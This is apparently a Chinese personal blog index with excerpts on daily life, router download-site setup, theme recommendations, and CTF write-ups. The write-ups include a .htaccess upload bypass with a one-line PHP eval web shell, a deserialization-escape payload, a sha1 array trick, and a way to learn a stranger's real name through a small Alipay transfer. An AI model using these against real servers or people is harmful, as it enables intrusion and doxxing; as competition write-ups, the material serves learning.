偷偷迁移到阿里云服务器上面 再偷偷备个案 然后惊艳所有人 :(你懂的)

生活 2021-02-18

最近白嫖了赛博niuzi2077(bushi) :xwx13:还挺好玩的 ,以后出联机模式再补票吧。 哦噢,博客换了个歌单,希望大家听的开心 :xwx10: ,从我的收藏歌单里面挑出来的。 博客访问实在是慢的不行,大家觉得卡可以开一下magic🔮上网,应该会快一点。 啊天天这么晚睡觉,白天中午才起床。。。不写了不写了睡觉了。 ::(星星月亮) (室友都说梦话了)

生活 2020-12-19

MISC png 下载图片发现是一张可爱猫咪图片,直接放到010editor里面,发现图片尾部有一段 base64M2I3OWJkZjhmY2ZkNTVmZH0=,拿去解码得到3b79bdf8fcfd55fd},后面好像没有什么东西了,然后尝试crc隐写。放入脚本解码得到原本的宽高为04 29修改后得到flag第一部分 不说人话 进去一看只有.!?三个字符,直接想到是Ook密码变形,然后打开记事本替换后解码即可 https://www.splitbrain.org/services/ook 【真签到题】快来看直播 进入直播间后flag就在上面 【The End】世界的终焉 明明是问卷,名字还这么高级 溯源!溯源!溯源! 这题真是。。一言难尽 多试了几次 第一题可以通过这个whois查询到邮箱https://www.whois365.com/cn/ 第二题查姓名第一个字是通过支付宝转账0.01之后可以直接通过银行app查看被转账人姓名 第三题姓名最后一个字直接进入支付宝转账界面看最后一个字 第四题百度电话号码,可以查到一个表单,里面包含南京雨花九如啥啥啥的养老院负责人电话,看了一下

CTF 2020-12-09

第一次参加这种比赛,写得很垃圾,200以上的都不会做。。。随便看看就好 :huaji13: 题目名称:Welcome 解题过程:打开发现405 ,百度搜索405发现需要使用post提交,burpsuite抓包改成post,forward,右键send to repeater 然后读一下代码发现 ($_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2']) 好怪啊这个东西,然后疯狂百度,搞了好久发现了这篇文章https://www.pianshen.com/article/732238291/ 里面说数组的sha1值相同,虽然不知道什么原理,但是直接用hackbar 在phpinfo界面找到auto_prepend_file ,后面有一个f1444aagggg.php,打开发现Not Found ,但是没有数据库信息和php信息,很怪,然后就不知道干啥,后来想着拿去burpsuite试一下查看源代码,然后就发现一行flag了 题目名称:朋友的学妹

CTF 2020-11-20

比赛:UNCTF2020校内赛 ID:Satan9a xuxuan AN_666 Xunflash Web 1.easy_ssrf 2.俄罗斯方块人大战奥特曼 查看源代码,发现有一个压缩包 下载下来 发现有 打开即可得到flag 3.easy_upload 解题过程: 上传题,测试不能上传php,phtml等,发现数据库是apache,尝试上传.htaccess文件,文件内容 plain AddType application/x-httpd-p\ hp .jpg 上传hp.jpg 内容 plain <?=eval($_POST[satan]); 连接蚁剑得到flag 4.easyunserialize 解题过程: 反序列化字符串逃逸,构造payload plain challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy"};;; 得出flag 5.ezphp 解题过程: 原题,构造payload plain data=a:2

CTF 2020-11-15

建站教程又来了!! 这次是白嫖5T OneDrive 加 Office全套加一个下载站! 可能这就是究极白嫖王吧 教程来自Alsaces:白嫖5T空间Onedrive并搭建下载站,在此基础上进行了一些配置,得到了路由器搭建下载站的教程。 🕛 下载安装nginx 这个时候就有人要问了,openwrt已经有uhttpd了还要什么nginx? 但是很无奈,支持搭建下载站的项目都需要伪静态,uhttpd我不懂配置伪静态 ::(泪) 在openwrt后台管理界面也就是luci界面找到软件包 搜索nginx安装,搜不到的话就打开https://openwrt.org/packages/pkgdata/nginx,找到自己路由器的架构打开下载安装包手动安装或者是连上路由器ssh输入 opkg install nginx 这样我们就成功安装好了nginx。 🕐 配置nginx 在配置nginx之前我们需要路由器存在php环境,具体可以看我之前的文章http://www.xunflash.top/index.php/archives/jianzhan2.html 在其中进行php配置。 然后我们打开

技术 2020-11-05

一款单栏md风格单栏主题 自己就在用 推荐下载,功能很多 独立页面 友链 追番 主题外观 主题配色 代码高亮 功能设置 短代码 全站公告 表情设置 文章置顶 语言设置 侧边抽屉 封面图源 静态资源 PJAX设置 文章/独立页面高级设置 图片展示: 免费,功能全 下载地址:https://github.com/bakaomg/castle-Typecho-Theme 文档地址:https://castle.baka.show/docs/0.9.5/#/

主题 2020-10-21

使用fusion app制作 里面还什么都没有哈,大家可以先下载看看,嘿嘿 :xwx14: 谢谢大家来看我 Xunflash的小站.apk

技术 2020-10-16

不用不知道,用了都说好 我肉眼可见的网站访问速度变快了我去 ::(真棒) 不多说了,赶紧去注册cloudflare,免费又快捷 :xwx13: https://dash.cloudflare.com/

生活 2020-10-14

有亿点点紧张 :xwx13: 没寄宿过 寝室没上床下桌真烦 明年才搞军训真不戳 xwx2: 带了个路由器到寝室里面看看能不能搞一些骚操作(

生活 2020-10-04